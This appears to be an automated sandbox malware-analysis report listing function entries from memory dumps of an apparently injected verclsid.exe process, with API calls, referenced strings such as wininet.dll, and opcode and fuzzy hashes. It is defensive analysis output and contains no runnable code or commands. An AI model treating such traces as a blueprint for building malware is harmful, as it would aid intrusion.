Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0fbce336e3ac274cb43b3d987ce6ebf4f785683c0cdf1d6f97097865048b8a26
Instruction ID: f1b509c2dd71619a4411dad9ae17340d3aa338085260fff0380ccf88e41ecf9b
Opcode Fuzzy Hash: 0fbce336e3ac274cb43b3d987ce6ebf4f785683c0cdf1d6f97097865048b8a26
Instruction Fuzzy Hash: BE90023160540803F1547259441475600459BD0315F59C011A0025754D8755DB5576A1

Function 045D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D35CA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07bfc5f5db5ac417123590bf3ed4658db9c7cd7a3111d7dcc373330eaf909997
Instruction ID: 9e21aa38b641ceecb4c13fced122ba055c136134fb0163856de1274f0d73846e
Opcode Fuzzy Hash: 07bfc5f5db5ac417123590bf3ed4658db9c7cd7a3111d7dcc373330eaf909997
Instruction Fuzzy Hash: F490023160550403F1047259451471610459BD0215F69C411A0425668D8795DA5175A2

Function 045D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D39BA

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 52138a7b12d63a2f34b6d57928d5b2af14cfdddbe90f93de00b384b4bc595867
Instruction ID: 45fb43231e9b983cc0a630424711108c1b8fc2315d4b64095aabf200cf3b7f09
Opcode Fuzzy Hash: 52138a7b12d63a2f34b6d57928d5b2af14cfdddbe90f93de00b384b4bc595867
Instruction Fuzzy Hash: 5B90022124545103F154725D44046264045BBE0215F59C021A0815694D8555D9557221

Function 003D3970 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 003D3A4B

Strings

net.dll, xrefs: 003D3A07, 003D3A96, 003D3A76, 003D3A82, 003D3AA2
wininet.dll, xrefs: 003D39DE, 003D39EA

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 019499d6297f6de943c851f6d4278f7204b060a80da1ed424bcde3c495f8366e
Instruction ID: 98d9e4266716f6625d60e3e154301d48ccef0baa7eb0e67be61e757476d1004f
Opcode Fuzzy Hash: 019499d6297f6de943c851f6d4278f7204b060a80da1ed424bcde3c495f8366e
Instruction Fuzzy Hash: C6318EB2A00705BBD715DFA4D881FEBB7B8FB88700F44852DB6595B341D7706A418BA1

Function 003CF38A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003CF3A7
CoUninitialize.COMBASE ref: 003CF48E

Strings

@J7<, xrefs: 003CF3BB

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 7fb710b7f9ddff437ef6c8691df8cba70606e27efa5328a0e8ba33f68e1eda6a
Instruction ID: f3534631388bb69316f15cb3da150084fa1c5d8cd7c2e624325eb0aa7ab3ce7c
Opcode Fuzzy Hash: 7fb710b7f9ddff437ef6c8691df8cba70606e27efa5328a0e8ba33f68e1eda6a
Instruction Fuzzy Hash: 9D313276A1060ADFDB05DFD9D880DEFB7B9BF88304B108569E505EB214D771AE05CBA0

Function 003CF390 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003CF3A7
CoUninitialize.COMBASE ref: 003CF48E

Strings

@J7<, xrefs: 003CF3BB

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 371225e84779fb8ea188eb84d52aa009cffab7ad630d3fcb975dfdd3332cdab9
Instruction ID: 51fc381c759f0741bb8526c67b12023e7d1c1559949ae6b97b30753a4ffdbcc3
Opcode Fuzzy Hash: 371225e84779fb8ea188eb84d52aa009cffab7ad630d3fcb975dfdd3332cdab9
Instruction Fuzzy Hash: 4F312FB6A0060A9FDB05DFD9D880DEFB7BABF88304B108559E505EB214D775EE05CBA0

Function 003D9600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 003D963F

Strings

a1<, xrefs: 003D9603

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: a1<
API String ID: 3298025750-1600521008
Opcode ID: 2efa40702ec438919dbcbf8a09229c89a54f78e9ae01cd40ee2cd257bef1d35a
Instruction ID: fba2573360152b38f7704a772b72aae16c9a4d7eec3a9dc4d30e4785e7010637
Opcode Fuzzy Hash: 2efa40702ec438919dbcbf8a09229c89a54f78e9ae01cd40ee2cd257bef1d35a
Instruction Fuzzy Hash: 6EE06D722002047BD614EF59DC41FDB37ACEFC8710F008409F908AB241CA70B91087B4

Function 003C43A3 Relevance: 1.6, APIs: 1, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003C4422

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 82554ed2c03de7997a4d315825c940acf26f8e4c6a04597bb5d2ae5ef93d38e8
Instruction ID: edd03f6628fde0d57239e2901bc93742bc12d915b7907bc0d0798f9d4b85c031
Opcode Fuzzy Hash: 82554ed2c03de7997a4d315825c940acf26f8e4c6a04597bb5d2ae5ef93d38e8
Instruction Fuzzy Hash: 7D01F9799040869BDB16DF54D890FACB765DF91309F05418EE848CB253EA32DE29C750

Function 003C43B0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003C4422

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 00d942c87c948fc33bf6d0a28c3962f0214707d7afd975e894d95002740caacb
Instruction ID: 5a1d27d58fc21755ab7b987d2a11e7d60586682c13759edf4c53d7d0b3cc0cbc
Opcode Fuzzy Hash: 00d942c87c948fc33bf6d0a28c3962f0214707d7afd975e894d95002740caacb
Instruction Fuzzy Hash: A00121B6D5020EABDF11EBE5EC42FDDB7789B54308F104199E9089B241F671EB14CB91

Function 003D9690 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00000044,00000000,00000000,0000000C,00000000,003CB172,?,?,?,00000000,?,003CB172,00000000,0000000C,00000000,00000000), ref: 003D96F0

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 28259ab4ed211497795ff25faa75a94e4f7199c064b5e76912f477d51da4844d
Instruction ID: 97e9eee560979a4891e2a33c03e5fbe44a66d30b1b4cecf49aac6849f487661e
Opcode Fuzzy Hash: 28259ab4ed211497795ff25faa75a94e4f7199c064b5e76912f477d51da4844d
Instruction Fuzzy Hash: CB019DB2214508BBCB54DE99DC81EEB77BDAF8C754F518208FA09E7281D670FC518BA4

Function 003C4430 Relevance: 1.5, APIs: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003C4422

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 5685f2ffee13ede49d7528cc2ac4854ecf7ab164cfeca43d5e13da8bac0efa39
Instruction ID: dd1e7035f3e93f1c5f06c7af866f054498ef90c1a057dc18e264c004adb864ad
Opcode Fuzzy Hash: 5685f2ffee13ede49d7528cc2ac4854ecf7ab164cfeca43d5e13da8bac0efa39
Instruction Fuzzy Hash: 3EF0F47854824DBFCB04CEA4CC91F9A7FBCEB81604F04418AF80897242DA20AE15CBA1

Function 003B9D90 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 003B9DD5

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c9a6f9969203894520f9e7f79af79585e196d52a4bc6dc5d2c86fc2ac51f69f6
Instruction ID: 9bfb8788d82978267f342ee2ed74d6a3d6f194fe189c38c999be608f5037c5d1
Opcode Fuzzy Hash: c9a6f9969203894520f9e7f79af79585e196d52a4bc6dc5d2c86fc2ac51f69f6
Instruction Fuzzy Hash: DBF065333506143BE62162AAAC03FD7B69CDB81765F140426F74CEF6C1D991B40146E5

Function 003B9D8C Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 003B9DD5

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c88389901b808e230b101c5d700a7b7f6be757a2abd3c389cccf5dcafdba6cfc
Instruction ID: 6eeebd87d69af0528372e4c664a73b9414bba0c298a3815edb6008c8c6c24306
Opcode Fuzzy Hash: c88389901b808e230b101c5d700a7b7f6be757a2abd3c389cccf5dcafdba6cfc
Instruction Fuzzy Hash: 05E092733406113BF6316299DC03FCB6798DB84754F15011AF748BF2C1D9A1B80187E8

Function 003D95B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(003C18D9,?,003D569B,003C18D9,003D557F,003D569B,?,003C18D9,003D557F,00001000,?,?,00000000), ref: 003D95EF

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69b36e2bb53b4d2a233f19849c185f78b1fb4443a14ec6e8ad9b56a6bb8e90f7
Instruction ID: 8857865d124ff7fd175cba20b10e4a1cd87b3a9a880e268c8b04d51669edd486
Opcode Fuzzy Hash: 69b36e2bb53b4d2a233f19849c185f78b1fb4443a14ec6e8ad9b56a6bb8e90f7
Instruction Fuzzy Hash: F1E065762102087FCA10EE59DC42F9B33ACEFC9714F004009FA09AB341C6B0B9108AB5

Function 003C81C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(003CD728,?,?,003CD728,00000000,?), ref: 003C81EC

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 06e3061b5d87af9c7aec2b9d8bc7a7690c510e4ebd446628f65a5972b3f61520
Instruction ID: 493acfdf6fc01b6e578f83d6255ee06e125c57985a5303e3057eb0da561aaa6f
Opcode Fuzzy Hash: 06e3061b5d87af9c7aec2b9d8bc7a7690c510e4ebd446628f65a5972b3f61520
Instruction Fuzzy Hash: 49E04F722402042BFA246BA8DC46F663398AB48724F5D4664B95CDF2D2E978EE024394

Function 003C7FB0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,003C1BE0,003D7EBF,003D557F,003C1BA3), ref: 003C7FE3

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5b0e5c6d656aa72be7dc31278e5c9346eb8684f39efc5980ba060c0cb0786f6f
Instruction ID: b59b85f6699ea5b27295143174c1f3eebe46adb0aa2121661ea6e83c971f5965
Opcode Fuzzy Hash: 5b0e5c6d656aa72be7dc31278e5c9346eb8684f39efc5980ba060c0cb0786f6f
Instruction Fuzzy Hash: 34D05E723843043BF641ABE6DC43F96368C9B40794F058068BA48DB2C2ED66E41047A6

Function 003C0CAB Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 003C0CBD

Memory Dump Source

Source File: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3b0000_verclsid.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
Instruction ID: 36627d1adbe4f8be396a516512c6419ce62dcb883d5ea9b4d0fbc7c61b3b60eb
Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
Instruction Fuzzy Hash: 12D0A732B8035C70EB2241545C42FFE776C8B41B00F10416BFB00F80C1D980180607A5

Function 045D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D2C24

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 999644eefb4c77d790fbb7371d8abd86d763f828c8acfe7246f58cb5614ffcbb
Instruction ID: 3fefd43f97f143b96c24fa4b76f0d0b56fc668aad8697efa85f6942cfb06fb14
Opcode Fuzzy Hash: 999644eefb4c77d790fbb7371d8abd86d763f828c8acfe7246f58cb5614ffcbb
Instruction Fuzzy Hash: 29B09B719025C5D6FB15F765560871779407FD0715F19C061E2030742E4738D5D1F175

Non-executed Functions

Function 048B04E8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3363367642.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_48b0000_verclsid.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd38b3352da47cb41d2584d81bc4623b4c5e17e81afff79eb1583829d8e6cca
Instruction ID: 6a0b2f130402a30b4f822efce150616a8e642d9d7e7ad5b92e29a0c2c3e676c4
Opcode Fuzzy Hash: bbd38b3352da47cb41d2584d81bc4623b4c5e17e81afff79eb1583829d8e6cca
Instruction Fuzzy Hash: 7541C571518B0D4FD368EF6C90816B7B2E1FB46304F504A2DD8DAC3752EB70E4468685

Function 048BDE49 Relevance: 56.5, Strings: 45, Instructions: 214COMMON

Download Yara Rule

Strings

@@@@, xrefs: 048BE02F
@@@@, xrefs: 048BDF79
@@@?, xrefs: 048BDEC3
!"#$, xrefs: 048BDF2C
@@@@, xrefs: 048BDF64
@@@@, xrefs: 048BDF87
@@@@, xrefs: 048BDF5D
@@@@, xrefs: 048BE028
@@@@, xrefs: 048BDF56
@@@@, xrefs: 048BDFB1
<=@@, xrefs: 048BDED8
@@@@, xrefs: 048BDF17
@@@@, xrefs: 048BE021
4567, xrefs: 048BDECA
@@@@, xrefs: 048BDF4F
@@@@, xrefs: 048BDFE2
@@@@, xrefs: 048BDFB8
@@@@, xrefs: 048BDFAA
@@@@, xrefs: 048BDFFE
@@@@, xrefs: 048BDFA3
@@@@, xrefs: 048BDF95
@@@@, xrefs: 048BDFE9
@@@@, xrefs: 048BDF72
@@@@, xrefs: 048BDFBF
@@@@, xrefs: 048BDEDF
%&'(, xrefs: 048BDF33
?, xrefs: 048BE040
@@@@, xrefs: 048BDFDB
@@@@, xrefs: 048BE01A
@@@@, xrefs: 048BDFCD
@@@@, xrefs: 048BE013
@@@@, xrefs: 048BDFF0
@@@@, xrefs: 048BDFC6
@@@@, xrefs: 048BDF6B
@@@@, xrefs: 048BDF8E
@@@@, xrefs: 048BE005
@@@@, xrefs: 048BE00C
@@@@, xrefs: 048BDFD4
)*+,, xrefs: 048BDF3A
-./0, xrefs: 048BDF41
@@@@, xrefs: 048BDFF7
@@@@, xrefs: 048BDF9C
@@@@, xrefs: 048BDF80
123@, xrefs: 048BDF48
89:;, xrefs: 048BDED1

Memory Dump Source

Source File: 00000007.00000002.3363367642.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_48b0000_verclsid.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 1aada6beaf99acc0db891d6b4cd902237b78069c5366aa77022e5bf2b14a1565
Instruction ID: b010740a69d9a693988fd1cdc782c29866c3a188de1377f8492e417d108dfdf4
Opcode Fuzzy Hash: 1aada6beaf99acc0db891d6b4cd902237b78069c5366aa77022e5bf2b14a1565
Instruction Fuzzy Hash: 8A9160F04082948EC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85

Function 045D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 045D293C
___swprintf_l.LIBCMT ref: 045D295E
___swprintf_l.LIBCMT ref: 045D29A3
___swprintf_l.LIBCMT ref: 0460A52E

Strings

:%u.%u.%u.%u, xrefs: 0460A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0460A54E
::%hs%u.%u.%u.%u, xrefs: 0460A527
ffff:, xrefs: 0460A504

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 0712dee104263626f01d1b31469b5a4a2b6d65e4380f22c83ccc5bd41311ac85
Instruction ID: 889cf275cd877e040e78962d3ff92ff7d0d8ae9160713b40231cb5bbe796a40f
Opcode Fuzzy Hash: 0712dee104263626f01d1b31469b5a4a2b6d65e4380f22c83ccc5bd41311ac85
Instruction Fuzzy Hash: 0351F9B1A04216BFDB24DF9CD88097EF7B8BF48244B50C1A9F495D3645E274FE40ABA0

Function 04642410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 046424A6
___swprintf_l.LIBCMT ref: 046424E2
___swprintf_l.LIBCMT ref: 0464257D
___swprintf_l.LIBCMT ref: 046425A3
___swprintf_l.LIBCMT ref: 046425C8
___swprintf_l.LIBCMT ref: 04642608

Strings

:%u.%u.%u.%u, xrefs: 046425FF
ffff:, xrefs: 0464247D, 0464249D
::ffff:0:%u.%u.%u.%u, xrefs: 046424DA
::%hs%u.%u.%u.%u, xrefs: 0464249E

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 5a040b726305df20a69ba2c2c1fe23a33c98f18d7c09af1232f4b67f088643ca
Instruction ID: 5bdd2a55ed7f461c4f29659d75bbb6b1c7f71ec267c50c74aa766dadc8c46c62
Opcode Fuzzy Hash: 5a040b726305df20a69ba2c2c1fe23a33c98f18d7c09af1232f4b67f088643ca
Instruction Fuzzy Hash: 4D51E461A00745ABDF24DF98C8A097EB7F8EF84244B208499F495D3641FAB4FE40DB60

Function 045C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 046046A0
Execute=1, xrefs: 04604713
CLIENT(ntdll): Processing section info %ws..., xrefs: 04604787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 046046FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04604655
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04604742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04604725

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: acd5efdbe9f3ddc5638ebd1d75bf42d2cf1c4509110920c1a2fe4b712eacfcc4
Instruction ID: 5bf897e5f6fecf6e5b8658542fc39493c69659714ae1afdb0d3abc86ec690c6b
Opcode Fuzzy Hash: acd5efdbe9f3ddc5638ebd1d75bf42d2cf1c4509110920c1a2fe4b712eacfcc4
Instruction Fuzzy Hash: 8751E93164021A7FEB24AAE4EC45BAE77A8FF48304F0405ADE505A7690EB70BE45EF54

Function 045DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 045DB6BF

Strings

+, xrefs: 045DB65A
0, xrefs: 045DB695
-, xrefs: 045DB650
0, xrefs: 045DB66F

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: df482e7070839e3b9841f48ec52477337fbef25c5637eec869dfa094528ae4aa
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 5C81CD70E052499BEF34CE6CD8907FEBBA3BF45350F1A461AE861A7290D734B840EB51

Function 046420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0464214F
___swprintf_l.LIBCMT ref: 04642172

Strings

]:%u, xrefs: 04642169
[, xrefs: 0464212B
%%%u, xrefs: 04642146

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 389fa2244be355680aaae17d928d8adacd1a68415e3211b102cb5c9b5c75e932
Instruction ID: 79368ffa922e8f802900cc0be5c6467c516a60dd925c60ba6997c6e3435eacd1
